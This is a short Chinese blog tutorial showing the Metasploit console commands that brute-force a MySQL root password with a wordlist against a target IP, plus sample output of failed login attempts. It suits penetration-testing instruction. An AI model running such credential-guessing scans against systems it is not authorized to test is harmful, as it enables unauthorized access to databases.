首页 > 数据库技术 > 详细

Metasploit扫描Mysql弱口令

时间:2014-09-01 19:44:23      阅读:929      评论:0      收藏:0      [点我收藏+]

msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml  msf连接数据库

[*] Rebuilding the module cache in the background...

msf > db_status   查看数据库连接状态

[*] postgresql connected to msf3


msf > use auxiliary/scanner/mysql/mysql_login   加载扫描模块

msf auxiliary(mysql_login) > set RHOSTS 1.5.5.3   目标IP地址

RHOSTS => 1.5.5.3

msf auxiliary(mysql_login) > set USERNAME root    目标用户名 一般为root

USERNAME => root

msf auxiliary(mysql_login) > set 

 PASS_FILE  /pen/msf3/data/wordlists/postgres_default_pass.txt   密码字典路劲,路劲随意填写


PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt

msf auxiliary(mysql_login) > exploit      开始扫描

[*] 1.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16

[*] 1.5.5.3:3306 MYSQL – [1/7] – Trying username:’root’ with password:”

[*] 1.5.5.3:3306 MYSQL – [1/7] – failed to login as ‘root’ with password ”

[*] 1.5.5.3:3306 MYSQL – [2/7] – Trying username:’root’ with password:’root’

[*] 1.5.5.3:3306 MYSQL – [2/7] – failed to login as ‘root’ with password ‘root’

[*] 1.5.5.3:3306 MYSQL – [3/7] – Trying username:’root’ with password:’tiger’

[*] 1.5.5.3:3306 MYSQL – [3/7] – failed to login as ‘root’ with password ‘tiger’

[*] 1.5.5.3:3306 MYSQL – [4/7] – Trying username:’root’ with password:’postgres’


能否扫描出来主要看密码字典

Metasploit扫描Mysql弱口令

原文:http://sqlmap.blog.51cto.com/9333759/1547545

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!